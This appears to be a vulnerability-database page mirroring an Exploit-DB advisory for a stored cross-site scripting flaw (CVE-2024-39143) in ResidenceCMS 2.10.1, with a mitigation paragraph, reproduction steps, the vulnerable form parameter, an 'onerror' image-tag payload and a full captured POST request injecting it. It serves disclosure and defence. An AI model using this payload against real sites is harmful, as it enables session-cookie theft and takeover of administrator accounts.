header-logo
Suggest Exploit
vendor:
ResidenceCMS
by:
Jeremia Geraldi Sihombing
6.1
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: ResidenceCMS
Affected Version From: 2.10.2001
Affected Version To: 2.10.2001
Patch Exists: NO
Related CWE: CVE-2024-39143
CPE: a:residencecms:residencecms:2.10.1
Metasploit:
Other Scripts:
Platforms Tested: Windows
2024

ResidenceCMS 2.10.1 – Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability is found in ResidenceCMS 2.10.1. This vulnerability permits a user with low privileges to insert malicious HTML content as a stored XSS payload within property pages. When the affected property page is accessed by any user, including the administrator, the XSS payload gets executed.

Mitigation:

To mitigate this vulnerability, input validation should be implemented strictly. All user inputs must be sanitized to remove any HTML tags or malicious scripts. Additionally, content security policies (CSP) can be applied to prevent the execution of unauthorized scripts.
Source

Exploit-DB raw data:

# Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)
# Date: 8-7-2024
# Category: Web Application
# Exploit Author: Jeremia Geraldi Sihombing
# Version: 2.10.1
# Tested on: Windows
# CVE: CVE-2024-39143

Description:
----------------
A stored cross-site scripting (XSS) vulnerability exists in
ResidenceCMS 2.10.1 that allows a low-privilege user to create
malicious property content with HTML inside it, which acts as a
stored XSS payload. If this property page is visited by anyone
including the administrator, then the XSS payload will be triggered..

Steps to reproduce
-------------------------

1. Login as a low privilege user with property edit capability.

2. Create or Edit one of the user owned property
(We can user the default property owned by the user).
3. Fill the content form with XSS payload using the Code View feature.
Before saving it make sure to go back using the usual view to see if the HTML
is rendered or not.

Vulnerable parameter name: property[property_description][content]

Example Payload: <img src="x" onerror="alert(document.cookie)">

4. After saving the new property content and clicking the 'Finish Editing',
go to the page and see the XSS is triggered.
It is possible to trigger the XSS by using any account or even
unauthorized account.

Burp Request
-------------------

POST /en/user/property/7/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/en/user/property/7/edit
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1

property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
renovated 2-bedroom 2-bathroom
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
Blvd, Tampa, FL
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

Navigation

Suggest Exploit

Services By CQR